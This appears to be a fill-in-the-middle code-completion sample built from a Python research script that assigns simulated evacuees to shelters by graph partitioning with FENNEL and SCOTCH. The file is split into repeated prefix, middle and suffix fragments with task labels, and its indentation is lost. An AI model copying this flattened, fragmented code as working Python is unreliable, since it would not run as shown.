print("{0:.5f}\t\t{1:.10f}\t{2}\t\t{3}".format(x[0], x[1], edges_cut, steps))
print("\nAssignments:")
shared.fixed_width_print(assignments)
nodes_fixed = len([o for o in fixed if o == 1])
print("\nFixed: {}".format(nodes_fixed))
shared.print_partitions(G, assignments, num_partitions)
# ******** END SECTION 2 ********** #
# ******** START SECTION 3 ********** #
if use_virtual_nodes:
print("Creating virtual nodes and assigning edges based on prediction model")
# create virtual nodes
virtual_nodes = list(range(G.number_of_nodes(), G.number_of_nodes() + num_partitions))
print("\nVirtual nodes:")
# create virtual edges
virtual_edges = []
for n in range(0, G.number_of_nodes()):
virtual_edges += [(n, virtual_nodes[assignments[n]])]
# extend assignments
assignments = np.append(assignments, np.array(list(range(0, num_partitions)), dtype=np.int32))
fixed = np.append(fixed, np.array([1] * num_partitions, dtype=np.int32))
G.add_nodes_from(virtual_nodes, weight=1)
G.add_edges_from(virtual_edges, weight=virtual_edge_weight)
print("\nAssignments:")
shared.fixed_width_print(assignments)
print("Last {} nodes are virtual nodes.".format(num_partitions))
# ******** END SECTION 3 ********** #
# ******** START SECTION 4 ********** #
cut_off_value = int(prediction_model_cut_off * G.number_of_nodes())
if prediction_model_cut_off == 0:
print("Discarding prediction model\n")
else:
print("Assign first {} arrivals using prediction model, then discard\n".format(cut_off_value))
# fix arrivals
nodes_arrived = []
for a in arrival_order:
# check if node needs a shelter
if simulated_arrival_list[a] == 0:
continue
# set 100% node weight for those that need a shelter
if alter_arrived_node_weight_to_100:
G.node[a]['weight'] = 100
nodes_fixed = len([o for o in fixed if o == 1])
if nodes_fixed >= cut_off_value:
break
fixed[a] = 1
nodes_arrived.append(a)
# remove nodes not fixed, ie. discard prediction model
for i in range(0, len(assignments)):
if fixed[i] == -1:
assignments[i] = -1
x = shared.score(G, assignments, num_partitions)
edges_cut, steps = shared.base_metrics(G, assignments)
print("WASTE\t\tCUT RATIO\tEDGES CUT\tCOMM VOLUME")
print("{0:.5f}\t\t{1:.10f}\t{2}\t\t{3}".format(x[0], x[1], edges_cut, steps))
print("\nAssignments:")
shared.fixed_width_print(assignments)
nodes_fixed = len([o for o in fixed if o == 1])
print("\nFixed: {}".format(nodes_fixed))
shared.print_partitions(G, assignments, num_partitions)
# ******** END SECTION 4 ********** #
# ******** START SECTION 5 ********** #
if restream_batches == 1:
print("One-shot assignment mode")
print("------------------------\n")
else:
print("Assigning in batches of {}".format(restream_batches))
print("--------------------------------\n")
def edge_expansion(G):
# Update edge weights for nodes that have an assigned probability of displacement
|
# preserve original node/edge weight
if graph_modification_functions:
node_weights = {n[0]: n[1]['weight'] for n in G.nodes_iter(data=True)}
nx.set_node_attributes(G, 'weight_orig', node_weights)
edge_weights = {(e[0], e[1]): e[2]['weight'] for e in G.edges_iter(data=True)}
nx.set_edge_attributes(G, 'weight_orig', edge_weights)
# SETUP SCOTCH VARIABLES
scotchMapper = None
scotchArrayData = None
if config.ASSIGNMENT_MODEL_ALGORITHM == config.Partitioners.SCOTCH:
scotchMapper = GraphMapper(config.SCOTCH_LIB_PATH, numPartitions=num_partitions)
scotchArrayData = ScotchGraphArrays()
# FOR DEBUGGING PURPOSES:
print('Graph mod fncs:',graph_modification_functions)
print('restream_batches:', restream_batches)
batch_arrived = []
print("WASTE\t\tCUT RATIO\tEDGES CUT\tCOMM VOLUME\tALPHA")
for i, a in enumerate(arrival_order):
# check if node is already arrived
if fixed[a] == 1:
continue
# GRAPH MODIFICATION FUNCTIONS
if graph_modification_functions:
# remove nodes that don't need a shelter
if simulated_arrival_list[a] == 0:
print('Removing Node', a)
G.remove_node(a)
continue
# set 100% node weight for those that need a shelter
if alter_arrived_node_weight_to_100:
print("Setting weight=100 on node", a)
G.node[a]['weight'] = 100
# one-shot assigment: assign each node as it arrives
if restream_batches == 1:
alpha = one_shot_alpha
if config.ASSIGNMENT_MODEL_ALGORITHM == config.Partitioners.FENNEL:
partition_votes = fennel.get_votes(G, a, num_partitions, assignments)
assignments[a] = fennel.get_assignment(G, a, num_partitions, assignments, partition_votes, alpha, 0)
elif config.ASSIGNMENT_MODEL_ALGORITHM == config.Partitioners.SCOTCH:
# load array data from graph
scotchArrayData.fromNetworkxGraph(G, parttab=assignments)
ok = scotchMapper.initialize(scotchArrayData)
if(ok):
# mapper initialized
ok = scotchMapper.graphMapFixed()
if(ok):
assignments = scotchMapper.scotchData._parttab
else:
print("Error running graphMapFixed()")
else:
print("Error initializing SCOTCH GraphMapper for graphMapFixed()")
fixed[a] = 1
nodes_arrived.append(a)
# make a subgraph of all arrived nodes
Gsub = G.subgraph(nodes_arrived)
x = shared.score(Gsub, assignments, num_partitions)
edges_cut, steps = shared.base_metrics(Gsub, assignments)
print("{0:.5f}\t\t{1:.10f}\t{2}\t\t{3}\t\t{4:.10f}".format(x[0], x[1], edges_cut, steps, alpha))
continue
batch_arrived.append(a)
# NOTE: TEMPORARY -> enable graph_modification_functions
graph_modification_functions = False
if restream_batches == len(batch_arrived) or i == len(arrival_order) - 1:
# GRAPH MODIFICATION FUNCTIONS
if graph_modification_functions:
# set node weight to prediction generated from a GAM
if alter_node_weight_to_gam_prediction:
total_arrived = nodes_arrived + batch_arrived + [a]
if len(total_arrived) < gam_k_value:
k = len(total_arrived)
else:
k = gam_k_value
gam_weights = shared.gam_predict(POPULATION_LOCATION_FILE, len(total_arrived), k)
for node in G.nodes_iter():
if alter_arrived_node_weight_to_100 and node in total_arrived:
pass # weight would have been set previously
else:
G.node[node]['weight'] = int(gam_weights[node] * 100)
G = edge_expansion(G)
# make a subgraph of all arrived nodes
Gsub = G.subgraph(nodes_arrived + batch_arrived)
# recalculate alpha
if Gsub.is_directed():
# as it's a directed graph, edges_arrived is actually double, so divide by 2
edges_arrived = Gsub.number_of_edges() / 2
else:
edges_arrived = Gsub.number_of_edges()
nodes_fixed = len([o for o in fixed if o == 1])
alpha = (edges_arrived) * (num_partitions / (nodes_fixed + len(batch_arrived))**2)
if alter_node_weight_to_gam_prediction:
# justification: the gam learns the entire population, so run fennal on entire population
assignments = fennel.generate_prediction_model(G,
num_iterations,
num_partitions,
assignments,
fixed,
alpha)
else:
# use the information we have, those that arrived
assignments = fennel.generate_prediction_model(Gsub,
num_iterations,
num_partitions,
assignments,
fixed,
alpha)
# assign nodes to prediction model
for n in batch_arrived:
fixed[n] = 1
nodes_arrived.append(n)
x = shared.score(Gsub, assignments, num_partitions)
edges_cut, steps = shared.base_metrics(Gsub, assignments)
print("{0:.5f}\t\t{1:.10f}\t{2}\t\t{3}\t\t{4:.10f}".format(x[0], x[1], edges_cut, steps, alpha))
batch_arrived = []
# remove nodes not fixed
for i in range(0, len(assignments)):
if fixed[i] == -1:
assignments[i] = -1
print("\nAssignments:")
shared.fixed_width_print(assignments)
nodes_fixed = len([o for o in fixed if o == 1])
print("\nFixed: {}".format(nodes_fixed))
shared.print_partitions(G, assignments, num_partitions)
# ******** END SECTION 5 ********** #
| for edge in G.edges_iter(data=True):
left = edge[0]
right = edge[1]
edge_weight = edge[2]['weight_orig']
# new edge weight
edge[2]['weight'] = (float(G.node[left]['weight']) * edge_weight) * (float(G.node[right]['weight']) * edge_weight)
if left in nodes_arrived or right in nodes_arrived:
# change the emphasis of the prediction model
edge[2]['weight'] = edge[2]['weight'] * prediction_model_emphasis
return G | identifier_body |
_debug_alg.py | import os
import shared
import networkx as nx
import numpy as np
import pyximport; pyximport.install()
import fennel
# ******** SECTION 1 ************* #
try:
import config
except ImportError as err:
print(err)
print("**Could not load config.py\n**Copy config_template.py and rename it.")
pwd = os.getcwd()
DATA_FILENAME = os.path.join(pwd, "data", "oneshot_fennel_weights.txt")
OUTPUT_DIRECTORY = os.path.join(pwd, "output")
# Read input file for prediction model, if not provided a prediction
# model is made using FENNEL
PREDICTION_MODEL = ""
# File containing simulated arrivals. This is used in simulating nodes
# arriving at the shelter. Nodes represented by line number; value of
# 1 represents a node as arrived; value of 0 represents the node as not
# arrived or needing a shelter.
SIMULATED_ARRIVAL_FILE = os.path.join(pwd, "data", "simulated_arrival.txt")
#SIMULATED_ARRIVAL_FILE = ""
# File containing the geographic location of each node.
POPULATION_LOCATION_FILE = os.path.join(pwd, "data", "population_location.csv")
# Number of shelters
num_partitions = 4
# The number of iterations when making prediction model
num_iterations = 10
# Percentage of prediction model to use before discarding
# When set to 0, prediction model is discarded, useful for one-shot
prediction_model_cut_off = 0.10
# Alpha value used in one-shot (when restream_batches set to 1)
one_shot_alpha = 0.5
# Number of arrivals to batch before recalculating alpha and restreaming.
# When set to 1, one-shot is used with alpha value from above
restream_batches = 10
# Create virtual nodes based on prediction model
use_virtual_nodes = False
# Virtual nodes: edge weight
virtual_edge_weight = 1.0
####
# GRAPH MODIFICATION FUNCTIONS
# Also enables the edge calculation function.
graph_modification_functions = True
# If set, the node weight is set to 100 if the node arrives at the shelter,
# otherwise the node is removed from the graph.
alter_arrived_node_weight_to_100 = True
# Uses generalized additive models from R to generate prediction of nodes not
# arrived. This sets the node weight on unarrived nodes the the prediction
# given by a GAM.
# Needs POPULATION_LOCATION_FILE to be set.
alter_node_weight_to_gam_prediction = True
gam_k_value = 100
# Alter the edge weight for nodes that haven't arrived. This is a way to
# de-emphasise the prediction model for the unknown nodes.
prediction_model_emphasis = 1.0
# read METIS file
G = shared.read_metis(DATA_FILENAME)
# Alpha value used in prediction model
prediction_model_alpha = G.number_of_edges() * (num_partitions / G.number_of_nodes()**2)
# Order of nodes arriving
arrival_order = list(range(0, G.number_of_nodes()))
# Arrival order should not be shuffled if using GAM to alter node weights
#random.shuffle(arrival_order)
if SIMULATED_ARRIVAL_FILE == "":
# mark all nodes as needing a shelter
simulated_arrival_list = [1]*G.number_of_nodes()
else:
with open(SIMULATED_ARRIVAL_FILE, "r") as ar:
simulated_arrival_list = [int(line.rstrip('\n')) for line in ar]
print("Graph loaded...")
print("Nodes: {}".format(G.number_of_nodes()))
print("Edges: {}".format(G.number_of_edges()))
if nx.is_directed(G):
print("Graph is directed")
else:
print("Graph is undirected")
# ******** END SECTION 1 ********** #
# ******** SECTION 2 **************#
# setup for other algorithms
if config.ENABLE_SCOTCH == True:
# import the relevant SCOTCH modules
from scotch.graph_mapper import GraphMapper
from scotch.io import ScotchGraphArrays
UNMAPPED = -1
# reset
assignments = np.repeat(np.int32(UNMAPPED), G.number_of_nodes())
fixed = np.repeat(np.int32(UNMAPPED), G.number_of_nodes())
print("PREDICTION MODEL")
print("----------------")
# Display which algorithm is being run
if config.PREDICTION_MODEL_ALGORITHM == config.Partitioners.FENNEL:
print("Using: FENNEL Partitioning")
print("---------------\n")
elif config.PREDICTION_MODEL_ALGORITHM == config.Partitioners.SCOTCH:
print("Using: SCOTCH Partitioning")
print("--------------------------\n")
predictionModels = {}
# store model data for different types of partitioners
# NOTE: THIS IS NOT IMPLEMENTED YET - need to discuss first
if config.RUN_ALL_PREDICTION_MODEL_ALGORITHMS == True:
# create different prediction models | fennelModel = {}
fennelModel['assignments'] = np.repeat(np.int32(UNMAPPED), G.number_of_nodes())
fennelModel['fixed'] = np.repeat(np.int32(UNMAPPED), G.number_of_nodes())
predictionModels[config.Partitioners.FENNEL] = fennelModel
scotchModel = {}
scotchModel['assignments'] = np.repeat(np.int32(UNMAPPED), G.number_of_nodes())
scotchModel['fixed'] = np.repeat(np.int32(UNMAPPED), G.number_of_nodes())
predictionModels[config.Partitioners.SCOTCH] = scotchModel
# Begin computation of prediction model
if PREDICTION_MODEL:
# if we have a prediction model from file, load it
with open(PREDICTION_MODEL, "r") as inf:
assignments = np.fromiter(inf.readlines(), dtype=np.int32)
else:
# choose the right algorithm
if config.PREDICTION_MODEL_ALGORITHM == config.Partitioners.FENNEL:
assignments = fennel.generate_prediction_model(G, num_iterations, num_partitions, assignments, fixed, prediction_model_alpha)
elif config.PREDICTION_MODEL_ALGORITHM == config.Partitioners.SCOTCH:
# SCOTCH algorithm
# we have a networkx graph already, G
scotchArrays = ScotchGraphArrays() # create the object storing all the SCOTCH arrays
scotchArrays.fromNetworkxGraph(G, baseval=0) # populate arrays from G
#scotchArrays.debugPrint() # uncomment this to print out contents of scotchArrays
# create instance of SCOTCH Library
mapper = GraphMapper(config.SCOTCH_LIB_PATH)
# set some optional parameters for the SCOTCH_Arch, SCOTCH_Strat, SCOTCH_Graph
# see csap-graphpartitioning/src/python/scotch/graph_mapper: GraphMapper.__init__() method for more options
mapper.kbalval = 0.1
mapper.numPartitions = num_partitions
# intializes the SCOTCH_Arch, SCOTCH_Strat, SCOTCH_Graph using scotchArray and optional parameters
ok = mapper.initialize(scotchArrays, verbose=False)
if(ok):
# we can proceed with graphMap, the data structures were setup correctly
ok = mapper.graphMap()
if(ok):
# graphMap was run successfully, copy the assignments
# make a deep copy as we then delete the mapper data, to clear memory
# and the array reference may be lost
assignments = np.array(mapper.scotchData._parttab, copy=True)
mapper.delObjects()
else:
print('Error while running graphMap()')
else:
print('Error while setting up SCOTCH for partitioning.')
x = shared.score(G, assignments, num_partitions)
edges_cut, steps = shared.base_metrics(G, assignments)
print("WASTE\t\tCUT RATIO\tEDGES CUT\tCOMM VOLUME")
print("{0:.5f}\t\t{1:.10f}\t{2}\t\t{3}".format(x[0], x[1], edges_cut, steps))
print("\nAssignments:")
shared.fixed_width_print(assignments)
nodes_fixed = len([o for o in fixed if o == 1])
print("\nFixed: {}".format(nodes_fixed))
shared.print_partitions(G, assignments, num_partitions)
# ******** END SECTION 2 ********** #
# ******** START SECTION 3 ********** #
if use_virtual_nodes:
print("Creating virtual nodes and assigning edges based on prediction model")
# create virtual nodes
virtual_nodes = list(range(G.number_of_nodes(), G.number_of_nodes() + num_partitions))
print("\nVirtual nodes:")
# create virtual edges
virtual_edges = []
for n in range(0, G.number_of_nodes()):
virtual_edges += [(n, virtual_nodes[assignments[n]])]
# extend assignments
assignments = np.append(assignments, np.array(list(range(0, num_partitions)), dtype=np.int32))
fixed = np.append(fixed, np.array([1] * num_partitions, dtype=np.int32))
G.add_nodes_from(virtual_nodes, weight=1)
G.add_edges_from(virtual_edges, weight=virtual_edge_weight)
print("\nAssignments:")
shared.fixed_width_print(assignments)
print("Last {} nodes are virtual nodes.".format(num_partitions))
# ******** END SECTION 3 ********** #
# ******** START SECTION 4 ********** #
cut_off_value = int(prediction_model_cut_off * G.number_of_nodes())
if prediction_model_cut_off == 0:
print("Discarding prediction model\n")
else:
print("Assign first {} arrivals using prediction model, then discard\n".format(cut_off_value))
# fix arrivals
nodes_arrived = []
for a in arrival_order:
# check if node needs a shelter
if simulated_arrival_list[a] == 0:
continue
# set 100% node weight for those that need a shelter
if alter_arrived_node_weight_to_100:
G.node[a]['weight'] = 100
nodes_fixed = len([o for o in fixed if o == 1])
if nodes_fixed >= cut_off_value:
break
fixed[a] = 1
nodes_arrived.append(a)
# remove nodes not fixed, ie. discard prediction model
for i in range(0, len(assignments)):
if fixed[i] == -1:
assignments[i] = -1
x = shared.score(G, assignments, num_partitions)
edges_cut, steps = shared.base_metrics(G, assignments)
print("WASTE\t\tCUT RATIO\tEDGES CUT\tCOMM VOLUME")
print("{0:.5f}\t\t{1:.10f}\t{2}\t\t{3}".format(x[0], x[1], edges_cut, steps))
print("\nAssignments:")
shared.fixed_width_print(assignments)
nodes_fixed = len([o for o in fixed if o == 1])
print("\nFixed: {}".format(nodes_fixed))
shared.print_partitions(G, assignments, num_partitions)
# ******** END SECTION 4 ********** #
# ******** START SECTION 5 ********** #
if restream_batches == 1:
print("One-shot assignment mode")
print("------------------------\n")
else:
print("Assigning in batches of {}".format(restream_batches))
print("--------------------------------\n")
def edge_expansion(G):
# Update edge weights for nodes that have an assigned probability of displacement
for edge in G.edges_iter(data=True):
left = edge[0]
right = edge[1]
edge_weight = edge[2]['weight_orig']
# new edge weight
edge[2]['weight'] = (float(G.node[left]['weight']) * edge_weight) * (float(G.node[right]['weight']) * edge_weight)
if left in nodes_arrived or right in nodes_arrived:
# change the emphasis of the prediction model
edge[2]['weight'] = edge[2]['weight'] * prediction_model_emphasis
return G
# preserve original node/edge weight
if graph_modification_functions:
node_weights = {n[0]: n[1]['weight'] for n in G.nodes_iter(data=True)}
nx.set_node_attributes(G, 'weight_orig', node_weights)
edge_weights = {(e[0], e[1]): e[2]['weight'] for e in G.edges_iter(data=True)}
nx.set_edge_attributes(G, 'weight_orig', edge_weights)
# SETUP SCOTCH VARIABLES
scotchMapper = None
scotchArrayData = None
if config.ASSIGNMENT_MODEL_ALGORITHM == config.Partitioners.SCOTCH:
scotchMapper = GraphMapper(config.SCOTCH_LIB_PATH, numPartitions=num_partitions)
scotchArrayData = ScotchGraphArrays()
# FOR DEBUGGING PURPOSES:
print('Graph mod fncs:',graph_modification_functions)
print('restream_batches:', restream_batches)
batch_arrived = []
print("WASTE\t\tCUT RATIO\tEDGES CUT\tCOMM VOLUME\tALPHA")
for i, a in enumerate(arrival_order):
# check if node is already arrived
if fixed[a] == 1:
continue
# GRAPH MODIFICATION FUNCTIONS
if graph_modification_functions:
# remove nodes that don't need a shelter
if simulated_arrival_list[a] == 0:
print('Removing Node', a)
G.remove_node(a)
continue
# set 100% node weight for those that need a shelter
if alter_arrived_node_weight_to_100:
print("Setting weight=100 on node", a)
G.node[a]['weight'] = 100
# one-shot assigment: assign each node as it arrives
if restream_batches == 1:
alpha = one_shot_alpha
if config.ASSIGNMENT_MODEL_ALGORITHM == config.Partitioners.FENNEL:
partition_votes = fennel.get_votes(G, a, num_partitions, assignments)
assignments[a] = fennel.get_assignment(G, a, num_partitions, assignments, partition_votes, alpha, 0)
elif config.ASSIGNMENT_MODEL_ALGORITHM == config.Partitioners.SCOTCH:
# load array data from graph
scotchArrayData.fromNetworkxGraph(G, parttab=assignments)
ok = scotchMapper.initialize(scotchArrayData)
if(ok):
# mapper initialized
ok = scotchMapper.graphMapFixed()
if(ok):
assignments = scotchMapper.scotchData._parttab
else:
print("Error running graphMapFixed()")
else:
print("Error initializing SCOTCH GraphMapper for graphMapFixed()")
fixed[a] = 1
nodes_arrived.append(a)
# make a subgraph of all arrived nodes
Gsub = G.subgraph(nodes_arrived)
x = shared.score(Gsub, assignments, num_partitions)
edges_cut, steps = shared.base_metrics(Gsub, assignments)
print("{0:.5f}\t\t{1:.10f}\t{2}\t\t{3}\t\t{4:.10f}".format(x[0], x[1], edges_cut, steps, alpha))
continue
batch_arrived.append(a)
# NOTE: TEMPORARY -> enable graph_modification_functions
graph_modification_functions = False
if restream_batches == len(batch_arrived) or i == len(arrival_order) - 1:
# GRAPH MODIFICATION FUNCTIONS
if graph_modification_functions:
# set node weight to prediction generated from a GAM
if alter_node_weight_to_gam_prediction:
total_arrived = nodes_arrived + batch_arrived + [a]
if len(total_arrived) < gam_k_value:
k = len(total_arrived)
else:
k = gam_k_value
gam_weights = shared.gam_predict(POPULATION_LOCATION_FILE, len(total_arrived), k)
for node in G.nodes_iter():
if alter_arrived_node_weight_to_100 and node in total_arrived:
pass # weight would have been set previously
else:
G.node[node]['weight'] = int(gam_weights[node] * 100)
G = edge_expansion(G)
# make a subgraph of all arrived nodes
Gsub = G.subgraph(nodes_arrived + batch_arrived)
# recalculate alpha
if Gsub.is_directed():
# as it's a directed graph, edges_arrived is actually double, so divide by 2
edges_arrived = Gsub.number_of_edges() / 2
else:
edges_arrived = Gsub.number_of_edges()
nodes_fixed = len([o for o in fixed if o == 1])
alpha = (edges_arrived) * (num_partitions / (nodes_fixed + len(batch_arrived))**2)
if alter_node_weight_to_gam_prediction:
# justification: the gam learns the entire population, so run fennal on entire population
assignments = fennel.generate_prediction_model(G,
num_iterations,
num_partitions,
assignments,
fixed,
alpha)
else:
# use the information we have, those that arrived
assignments = fennel.generate_prediction_model(Gsub,
num_iterations,
num_partitions,
assignments,
fixed,
alpha)
# assign nodes to prediction model
for n in batch_arrived:
fixed[n] = 1
nodes_arrived.append(n)
x = shared.score(Gsub, assignments, num_partitions)
edges_cut, steps = shared.base_metrics(Gsub, assignments)
print("{0:.5f}\t\t{1:.10f}\t{2}\t\t{3}\t\t{4:.10f}".format(x[0], x[1], edges_cut, steps, alpha))
batch_arrived = []
# remove nodes not fixed
for i in range(0, len(assignments)):
if fixed[i] == -1:
assignments[i] = -1
print("\nAssignments:")
shared.fixed_width_print(assignments)
nodes_fixed = len([o for o in fixed if o == 1])
print("\nFixed: {}".format(nodes_fixed))
shared.print_partitions(G, assignments, num_partitions)
# ******** END SECTION 5 ********** # | random_line_split | |
_debug_alg.py | import os
import shared
import networkx as nx
import numpy as np
import pyximport; pyximport.install()
import fennel
# ******** SECTION 1 ************* #
try:
import config
except ImportError as err:
print(err)
print("**Could not load config.py\n**Copy config_template.py and rename it.")
pwd = os.getcwd()
DATA_FILENAME = os.path.join(pwd, "data", "oneshot_fennel_weights.txt")
OUTPUT_DIRECTORY = os.path.join(pwd, "output")
# Read input file for prediction model, if not provided a prediction
# model is made using FENNEL
PREDICTION_MODEL = ""
# File containing simulated arrivals. This is used in simulating nodes
# arriving at the shelter. Nodes represented by line number; value of
# 1 represents a node as arrived; value of 0 represents the node as not
# arrived or needing a shelter.
SIMULATED_ARRIVAL_FILE = os.path.join(pwd, "data", "simulated_arrival.txt")
#SIMULATED_ARRIVAL_FILE = ""
# File containing the geographic location of each node.
POPULATION_LOCATION_FILE = os.path.join(pwd, "data", "population_location.csv")
# Number of shelters
num_partitions = 4
# The number of iterations when making prediction model
num_iterations = 10
# Percentage of prediction model to use before discarding
# When set to 0, prediction model is discarded, useful for one-shot
prediction_model_cut_off = 0.10
# Alpha value used in one-shot (when restream_batches set to 1)
one_shot_alpha = 0.5
# Number of arrivals to batch before recalculating alpha and restreaming.
# When set to 1, one-shot is used with alpha value from above
restream_batches = 10
# Create virtual nodes based on prediction model
use_virtual_nodes = False
# Virtual nodes: edge weight
virtual_edge_weight = 1.0
####
# GRAPH MODIFICATION FUNCTIONS
# Also enables the edge calculation function.
graph_modification_functions = True
# If set, the node weight is set to 100 if the node arrives at the shelter,
# otherwise the node is removed from the graph.
alter_arrived_node_weight_to_100 = True
# Uses generalized additive models from R to generate prediction of nodes not
# arrived. This sets the node weight on unarrived nodes the the prediction
# given by a GAM.
# Needs POPULATION_LOCATION_FILE to be set.
alter_node_weight_to_gam_prediction = True
gam_k_value = 100
# Alter the edge weight for nodes that haven't arrived. This is a way to
# de-emphasise the prediction model for the unknown nodes.
prediction_model_emphasis = 1.0
# read METIS file
G = shared.read_metis(DATA_FILENAME)
# Alpha value used in prediction model
prediction_model_alpha = G.number_of_edges() * (num_partitions / G.number_of_nodes()**2)
# Order of nodes arriving
arrival_order = list(range(0, G.number_of_nodes()))
# Arrival order should not be shuffled if using GAM to alter node weights
#random.shuffle(arrival_order)
if SIMULATED_ARRIVAL_FILE == "":
# mark all nodes as needing a shelter
simulated_arrival_list = [1]*G.number_of_nodes()
else:
with open(SIMULATED_ARRIVAL_FILE, "r") as ar:
simulated_arrival_list = [int(line.rstrip('\n')) for line in ar]
print("Graph loaded...")
print("Nodes: {}".format(G.number_of_nodes()))
print("Edges: {}".format(G.number_of_edges()))
if nx.is_directed(G):
print("Graph is directed")
else:
print("Graph is undirected")
# ******** END SECTION 1 ********** #
# ******** SECTION 2 **************#
# setup for other algorithms
if config.ENABLE_SCOTCH == True:
# import the relevant SCOTCH modules
from scotch.graph_mapper import GraphMapper
from scotch.io import ScotchGraphArrays
UNMAPPED = -1
# reset
assignments = np.repeat(np.int32(UNMAPPED), G.number_of_nodes())
fixed = np.repeat(np.int32(UNMAPPED), G.number_of_nodes())
print("PREDICTION MODEL")
print("----------------")
# Display which algorithm is being run
if config.PREDICTION_MODEL_ALGORITHM == config.Partitioners.FENNEL:
print("Using: FENNEL Partitioning")
print("---------------\n")
elif config.PREDICTION_MODEL_ALGORITHM == config.Partitioners.SCOTCH:
print("Using: SCOTCH Partitioning")
print("--------------------------\n")
predictionModels = {}
# store model data for different types of partitioners
# NOTE: THIS IS NOT IMPLEMENTED YET - need to discuss first
if config.RUN_ALL_PREDICTION_MODEL_ALGORITHMS == True:
# create different prediction models
fennelModel = {}
fennelModel['assignments'] = np.repeat(np.int32(UNMAPPED), G.number_of_nodes())
fennelModel['fixed'] = np.repeat(np.int32(UNMAPPED), G.number_of_nodes())
predictionModels[config.Partitioners.FENNEL] = fennelModel
scotchModel = {}
scotchModel['assignments'] = np.repeat(np.int32(UNMAPPED), G.number_of_nodes())
scotchModel['fixed'] = np.repeat(np.int32(UNMAPPED), G.number_of_nodes())
predictionModels[config.Partitioners.SCOTCH] = scotchModel
# Begin computation of prediction model
if PREDICTION_MODEL:
# if we have a prediction model from file, load it
with open(PREDICTION_MODEL, "r") as inf:
assignments = np.fromiter(inf.readlines(), dtype=np.int32)
else:
# choose the right algorithm
if config.PREDICTION_MODEL_ALGORITHM == config.Partitioners.FENNEL:
assignments = fennel.generate_prediction_model(G, num_iterations, num_partitions, assignments, fixed, prediction_model_alpha)
elif config.PREDICTION_MODEL_ALGORITHM == config.Partitioners.SCOTCH:
# SCOTCH algorithm
# we have a networkx graph already, G
scotchArrays = ScotchGraphArrays() # create the object storing all the SCOTCH arrays
scotchArrays.fromNetworkxGraph(G, baseval=0) # populate arrays from G
#scotchArrays.debugPrint() # uncomment this to print out contents of scotchArrays
# create instance of SCOTCH Library
mapper = GraphMapper(config.SCOTCH_LIB_PATH)
# set some optional parameters for the SCOTCH_Arch, SCOTCH_Strat, SCOTCH_Graph
# see csap-graphpartitioning/src/python/scotch/graph_mapper: GraphMapper.__init__() method for more options
mapper.kbalval = 0.1
mapper.numPartitions = num_partitions
# intializes the SCOTCH_Arch, SCOTCH_Strat, SCOTCH_Graph using scotchArray and optional parameters
ok = mapper.initialize(scotchArrays, verbose=False)
if(ok):
# we can proceed with graphMap, the data structures were setup correctly
ok = mapper.graphMap()
if(ok):
# graphMap was run successfully, copy the assignments
# make a deep copy as we then delete the mapper data, to clear memory
# and the array reference may be lost
assignments = np.array(mapper.scotchData._parttab, copy=True)
mapper.delObjects()
else:
print('Error while running graphMap()')
else:
print('Error while setting up SCOTCH for partitioning.')
x = shared.score(G, assignments, num_partitions)
edges_cut, steps = shared.base_metrics(G, assignments)
print("WASTE\t\tCUT RATIO\tEDGES CUT\tCOMM VOLUME")
print("{0:.5f}\t\t{1:.10f}\t{2}\t\t{3}".format(x[0], x[1], edges_cut, steps))
print("\nAssignments:")
shared.fixed_width_print(assignments)
nodes_fixed = len([o for o in fixed if o == 1])
print("\nFixed: {}".format(nodes_fixed))
shared.print_partitions(G, assignments, num_partitions)
# ******** END SECTION 2 ********** #
# ******** START SECTION 3 ********** #
if use_virtual_nodes:
print("Creating virtual nodes and assigning edges based on prediction model")
# create virtual nodes
virtual_nodes = list(range(G.number_of_nodes(), G.number_of_nodes() + num_partitions))
print("\nVirtual nodes:")
# create virtual edges
virtual_edges = []
for n in range(0, G.number_of_nodes()):
virtual_edges += [(n, virtual_nodes[assignments[n]])]
# extend assignments
assignments = np.append(assignments, np.array(list(range(0, num_partitions)), dtype=np.int32))
fixed = np.append(fixed, np.array([1] * num_partitions, dtype=np.int32))
G.add_nodes_from(virtual_nodes, weight=1)
G.add_edges_from(virtual_edges, weight=virtual_edge_weight)
print("\nAssignments:")
shared.fixed_width_print(assignments)
print("Last {} nodes are virtual nodes.".format(num_partitions))
# ******** END SECTION 3 ********** #
# ******** START SECTION 4 ********** #
cut_off_value = int(prediction_model_cut_off * G.number_of_nodes())
if prediction_model_cut_off == 0:
print("Discarding prediction model\n")
else:
print("Assign first {} arrivals using prediction model, then discard\n".format(cut_off_value))
# fix arrivals
nodes_arrived = []
for a in arrival_order:
# check if node needs a shelter
if simulated_arrival_list[a] == 0:
continue
# set 100% node weight for those that need a shelter
if alter_arrived_node_weight_to_100:
G.node[a]['weight'] = 100
nodes_fixed = len([o for o in fixed if o == 1])
if nodes_fixed >= cut_off_value:
break
fixed[a] = 1
nodes_arrived.append(a)
# remove nodes not fixed, ie. discard prediction model
for i in range(0, len(assignments)):
if fixed[i] == -1:
assignments[i] = -1
x = shared.score(G, assignments, num_partitions)
edges_cut, steps = shared.base_metrics(G, assignments)
print("WASTE\t\tCUT RATIO\tEDGES CUT\tCOMM VOLUME")
print("{0:.5f}\t\t{1:.10f}\t{2}\t\t{3}".format(x[0], x[1], edges_cut, steps))
print("\nAssignments:")
shared.fixed_width_print(assignments)
nodes_fixed = len([o for o in fixed if o == 1])
print("\nFixed: {}".format(nodes_fixed))
shared.print_partitions(G, assignments, num_partitions)
# ******** END SECTION 4 ********** #
# ******** START SECTION 5 ********** #
if restream_batches == 1:
print("One-shot assignment mode")
print("------------------------\n")
else:
|
def edge_expansion(G):
# Update edge weights for nodes that have an assigned probability of displacement
for edge in G.edges_iter(data=True):
left = edge[0]
right = edge[1]
edge_weight = edge[2]['weight_orig']
# new edge weight
edge[2]['weight'] = (float(G.node[left]['weight']) * edge_weight) * (float(G.node[right]['weight']) * edge_weight)
if left in nodes_arrived or right in nodes_arrived:
# change the emphasis of the prediction model
edge[2]['weight'] = edge[2]['weight'] * prediction_model_emphasis
return G
# preserve original node/edge weight
if graph_modification_functions:
node_weights = {n[0]: n[1]['weight'] for n in G.nodes_iter(data=True)}
nx.set_node_attributes(G, 'weight_orig', node_weights)
edge_weights = {(e[0], e[1]): e[2]['weight'] for e in G.edges_iter(data=True)}
nx.set_edge_attributes(G, 'weight_orig', edge_weights)
# SETUP SCOTCH VARIABLES
scotchMapper = None
scotchArrayData = None
if config.ASSIGNMENT_MODEL_ALGORITHM == config.Partitioners.SCOTCH:
scotchMapper = GraphMapper(config.SCOTCH_LIB_PATH, numPartitions=num_partitions)
scotchArrayData = ScotchGraphArrays()
# FOR DEBUGGING PURPOSES:
print('Graph mod fncs:',graph_modification_functions)
